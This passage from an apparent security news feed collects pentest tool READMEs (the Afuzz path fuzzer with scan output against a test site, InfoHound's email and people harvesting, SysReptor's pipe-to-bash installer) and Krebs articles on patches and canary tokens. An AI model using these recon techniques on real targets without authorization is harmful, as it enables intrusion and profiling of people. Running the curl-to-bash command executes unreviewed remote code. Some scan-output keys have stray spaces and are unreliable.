| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


☐ ☆ ✇ KitPloit - PenTest Tools!

SecuSphere - Efficient DevSecOps

By: Zion3R — October 21st 2023 at 11:30


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



☐ ☆ ✇ Krebs on Security

Patch Tuesday, October 2023 Edition

By: BrianKrebs — October 10th 2023 at 22:51

Microsoft today issued security updates for more than 100 newly-discovered vulnerabilities in its Windows operating system and related software, including four flaws that are already being exploited. In addition, Apple recently released emergency updates to quash a pair of zero-day bugs in iOS.

Apple last week shipped emergency updates in iOS 17.0.3 and iPadOS 17.0.3 in response to active attacks. The patch fixes CVE-2023-42724, which attackers have been using in targeted attacks to elevate their access on a local device.

Apple said it also patched CVE-2023-5217, which is not listed as a zero-day bug. However, as Bleeping Computer pointed out, this flaw is caused by a weakness in the open-source “libvpx” video codec library, which was previously patched as a zero-day flaw by Google in the Chrome browser and by Microsoft in Edge, Teams, and Skype products. For anyone keeping count, this is the 17th zero-day flaw that Apple has patched so far this year.

Fortunately, the zero-days affecting Microsoft customers this month are somewhat less severe than usual, with the exception of CVE-2023-44487. This weakness is not specific to Windows but instead exists within the HTTP/2 protocol used by the World Wide Web: Attackers have figured out how to use a feature of HTTP/2 to massively increase the size of distributed denial-of-service (DDoS) attacks, and these monster attacks reportedly have been going on for several weeks now.

Amazon, Cloudflare and Google all released advisories today about how they’re addressing CVE-2023-44487 in their cloud environments. Google’s Damian Menscher wrote on Twitter/X that the exploit — dubbed a “rapid reset attack” — works by sending a request and then immediately cancelling it (a feature of HTTP/2). “This lets attackers skip waiting for responses, resulting in a more efficient attack,” Menscher explained.

Natalie Silva, lead security engineer at Immersive Labs, said this flaw’s impact to enterprise customers could be significant, and lead to prolonged downtime.

“It is crucial for organizations to apply the latest patches and updates from their web server vendors to mitigate this vulnerability and protect against such attacks,” Silva said. In this month’s Patch Tuesday release by Microsoft, they have released both an update to this vulnerability, as well as a temporary workaround should you not be able to patch immediately.”

Microsoft also patched zero-day bugs in Skype for Business (CVE-2023-41763) and Wordpad (CVE-2023-36563). The latter vulnerability could expose NTLM hashes, which are used for authentication in Windows environments.

“It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given,” said Adam Barnett, lead software engineer at Rapid7. “Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.”

Other notable bugs addressed by Microsoft include CVE-2023-35349, a remote code execution weakness in the Message Queuing (MSMQ) service, a technology that allows applications across multiple servers or hosts to communicate with each other. This vulnerability has earned a CVSS severity score of 9.8 (10 is the worst possible). Happily, the MSMQ service is not enabled by default in Windows, although Immersive Labs notes that Microsoft Exchange Server can enable this service during installation.

Speaking of Exchange, Microsoft also patched CVE-2023-36778,  a vulnerability in all current versions of Exchange Server that could allow attackers to run code of their choosing. Rapid7’s Barnett said successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell session.

For a more detailed breakdown on the updates released today, see the SANS Internet Storm Center roundup. If today’s updates cause any stability or usability issues in Windows, AskWoody.com will likely have the lowdown on that.

Please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

☐ ☆ ✇ KitPloit - PenTest Tools!

VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R — September 12th 2023 at 11:30

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



☐ ☆ ✇ Krebs on Security

Tourists Give Themselves Away by Looking Up. So Do Most Network Intruders.

By: BrianKrebs — August 22nd 2023 at 17:45

In large metropolitan areas, tourists are often easy to spot because they’re far more inclined than locals to gaze upward at the surrounding skyscrapers. Security experts say this same tourist dynamic is a dead giveaway in virtually all computer intrusions that lead to devastating attacks like data theft and ransomware, and that more organizations should set simple virtual tripwires that sound the alarm when authorized users and devices are spotted exhibiting this behavior.

In a blog post published last month, Cisco Talos said it was seeing a worrisome “increase in the rate of high-sophistication attacks on network infrastructure.” Cisco’s warning comes amid a flurry of successful data ransom and state-sponsored cyber espionage attacks targeting some of the most well-defended networks on the planet.

But despite their increasing complexity, a great many initial intrusions that lead to data theft could be nipped in the bud if more organizations started looking for the telltale signs of newly-arrived cybercriminals behaving like network tourists, Cisco says.

“One of the most important things to talk about here is that in each of the cases we’ve seen, the threat actors are taking the type of ‘first steps’ that someone who wants to understand (and control) your environment would take,” Cisco’s Hazel Burton wrote. “Examples we have observed include threat actors performing a ‘show config,’ ‘show interface,’ ‘show route,’ ‘show arp table’ and a ‘show CDP neighbor.’ All these actions give the attackers a picture of a router’s perspective of the network, and an understanding of what foothold they have.”

Cisco’s alert concerned espionage attacks from China and Russia that abused vulnerabilities in aging, end-of-life network routers. But at a very important level, it doesn’t matter how or why the attackers got that initial foothold on your network.

It might be zero-day vulnerabilities in your network firewall or file-transfer appliance. Your more immediate and primary concern has to be: How quickly can you detect and detach that initial foothold?

The same tourist behavior that Cisco described attackers exhibiting vis-a-vis older routers is also incredibly common early on in ransomware and data ransom attacks — which often unfurl in secret over days or weeks as attackers methodically identify and compromise a victim’s key network assets.

These virtual hostage situations usually begin with the intruders purchasing access to the target’s network from dark web brokers who resell access to stolen credentials and compromised computers. As a result, when those stolen resources first get used by would-be data thieves, almost invariably the attackers will run a series of basic commands asking the local system to confirm exactly who and where they are on the victim’s network.

This fundamental reality about modern cyberattacks — that cybercriminals almost always orient themselves by “looking up” who and where they are upon entering a foreign network for the first time — forms the business model of an innovative security company called Thinkst, which gives away easy-to-use tripwires or “canaries” that can fire off an alert whenever all sorts of suspicious activity is witnessed.

“Many people have pointed out that there are a handful of commands that are overwhelmingly run by attackers on compromised hosts (and seldom ever by regular users/usage),” the Thinkst website explains. “Reliably alerting when a user on your code-sign server runs whoami.exe can mean the difference between catching a compromise in week-1 (before the attackers dig in) and learning about the attack on CNN.”

These canaries — or “canary tokens” — are meant to be embedded inside regular files, acting much like a web beacon or web bug that tracks when someone opens an email.

The Canary Tokens website from Thinkst Canary lists nearly two-dozen free customizable canaries.

“Imagine doing that, but for file reads, database queries, process executions or patterns in log files,” the Canary Tokens documentation explains. “Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.”

Thinkst operates alongside a burgeoning industry offering so-called “deception” or “honeypot” services — those designed to confuse, disrupt and entangle network intruders. But in an interview with KrebsOnSecurity, Thinkst founder and CEO Haroon Meer said most deception techniques involve some degree of hubris.

“Meaning, you’ll have deception teams in your network playing spy versus spy with people trying to break in, and it becomes this whole counterintelligence thing,” Meer said. “Nobody really has time for that. Instead, we are saying literally the opposite: That you’ve probably got all these [security improvement] projects that are going to take forever. But while you’re doing all that, just drop these 10 canaries, because everything else is going to take a long time to do.”

The idea here is to lay traps in sensitive areas of your network or web applications where few authorized users should ever trod. Importantly, the canary tokens themselves are useless to an attacker. For example, that AWS canary token sure looks like the digital keys to your cloud, but the token itself offers no access. It’s just a lure for the bad guys, and you get an alert when and if it is ever touched.

One nice thing about canary tokens is that Thinkst gives them away for free. Head over to canarytokens.org, and choose from a drop-down menu of available tokens, including:

-a web bug / URL token, designed to alert when a particular URL is visited;
-a DNS token, which alerts when a hostname is requested;
-an AWS token, which alerts when a specific Amazon Web Services key is used;
-a “custom exe” token, to alert when a specific Windows executable file or DLL is run;
-a “sensitive command” token, to alert when a suspicious Windows command is run.
-a Microsoft Excel/Word token, which alerts when a specific Excel or Word file is accessed.

Much like a “wet paint” sign often encourages people to touch a freshly painted surface anyway, attackers often can’t help themselves when they enter a foreign network and stumble upon what appear to be key digital assets, Meer says.

“If an attacker lands on your server and finds a key to your cloud environment, it’s really hard for them not to try it once,” Meer said. “Also, when these sorts of actors do land in a network, they have to orient themselves, and while doing that they are going to trip canaries.”

Meer says canary tokens are as likely to trip up attackers as they are “red teams,” security experts hired or employed by companies seeking to continuously probe their own computer systems and networks for security weaknesses.

“The concept and use of canary tokens has made me very hesitant to use credentials gained during an engagement, versus finding alternative means to an end goal,” wrote Shubham Shah, a penetration tester and co-founder of the security firm Assetnote. “If the aim is to increase the time taken for attackers, canary tokens work well.”

Thinkst makes money by selling Canary Tools, which are honeypots that emulate full blown systems like Windows servers or IBM mainframes. They deploy in minutes and include a personalized, private Canarytoken server.

“If you’ve got a sophisticated defense team, you can start putting these things in really interesting places,” Meer said. “Everyone says their stuff is simple, but we obsess over it. It’s really got to be so simple that people can’t mess it up. And if it works, it’s the best bang for your security buck you’re going to get.”

Further reading:

Dark Reading: Credential Canaries Create Minefield for Attackers
NCC Group: Extending a Thinkst Canary to Become an Interactive Honeypot
Cruise Automation’s experience deploying canary tokens

☐ ☆ ✇ KitPloit - PenTest Tools!

Bryobio - NETWORK Pcap File Analysis

By: Zion3R — August 18th 2023 at 12:30


NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦

$ https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



☐ ☆ ✇ KitPloit - PenTest Tools!

InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R — August 16th 2023 at 20:58


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

 Retrievval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



☐ ☆ ✇ Krebs on Security

Microsoft Patch Tuesday, August 2023 Edition

By: BrianKrebs — August 9th 2023 at 02:22

Microsoft Corp. today issued software updates to plug more than 70 security holes in its Windows operating systems and related products, including multiple zero-day vulnerabilities currently being exploited in the wild.

Six of the flaws fixed today earned Microsoft’s “critical” rating, meaning malware or miscreants could use them to install software on a vulnerable Windows system without any help from users.

Last month, Microsoft acknowledged a series of zero-day vulnerabilities in a variety of Microsoft products that were discovered and exploited in-the-wild attacks. They were assigned a single placeholder designation of CVE-2023-36884.

Satnam Narang, senior staff research engineer at Tenable, said the August patch batch addresses CVE-2023-36884, which involves bypassing the Windows Search Security feature.

“Microsoft also released ADV230003, a defense-in-depth update designed to stop the attack chain associated that leads to the exploitation of this CVE,” Narang said. “Given that this has already been successfully exploited in the wild as a zero-day, organizations should prioritize patching this vulnerability and applying the defense-in-depth update as soon as possible.”

Redmond patched another flaw that is already seeing active attacks — CVE-2023-38180 — a weakness in .NET and Visual Studio that leads to a denial-of-service condition on vulnerable servers.

“Although the attacker would need to be on the same network as the target system, this vulnerability does not require the attacker to have acquired user privileges,” on the target system, wrote Nikolas Cemerikic, cyber security engineer at Immersive Labs.

Narang said the software giant also patched six vulnerabilities in Microsoft Exchange Server, including CVE-2023-21709, an elevation of privilege flaw that was assigned a CVSSv3 (threat) score of 9.8 out of a possible 10, even though Microsoft rates it as an important flaw, not critical.

“An unauthenticated attacker could exploit this vulnerability by conducting a brute-force attack against valid user accounts,” Narang said. “Despite the high rating, the belief is that brute-force attacks won’t be successful against accounts with strong passwords. However, if weak passwords are in use, this would make brute-force attempts more successful. The remaining five vulnerabilities range from a spoofing flaw and multiple remote code execution bugs, though the most severe of the bunch also require credentials for a valid account.”

Experts at security firm Automox called attention to CVE-2023-36910, a remote code execution bug in the Microsoft Message Queuing service that can be exploited remotely and without privileges to execute code on vulnerable Windows 10, 11 and Server 2008-2022 systems. Microsoft says it considers this vulnerability “less likely” to be exploited, and Automox says while the message queuing service is not enabled by default in Windows and is less common today, any device with it enabled is at critical risk.

Separately, Adobe has issued a critical security update for Acrobat and Reader that resolves at least 30 security vulnerabilities in those products. Adobe said it is not aware of any exploits in the wild targeting these flaws. The company also issued security updates for Adobe Commerce and Adobe Dimension.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a fair chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

-SANS Internet Storm Center listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

AskWoody.com, which keeps tabs on any developing problems related to the availability or installation of these updates.

☐ ☆ ✇ KitPloit - PenTest Tools!

Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R — July 14th 2023 at 12:30


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor with via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





☐ ☆ ✇ KitPloit - PenTest Tools!

ZeusCloud - Open Source Cloud Security

By: Zion3R — July 13th 2023 at 12:30


ZeusCloud is an open source cloud security platform.

Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

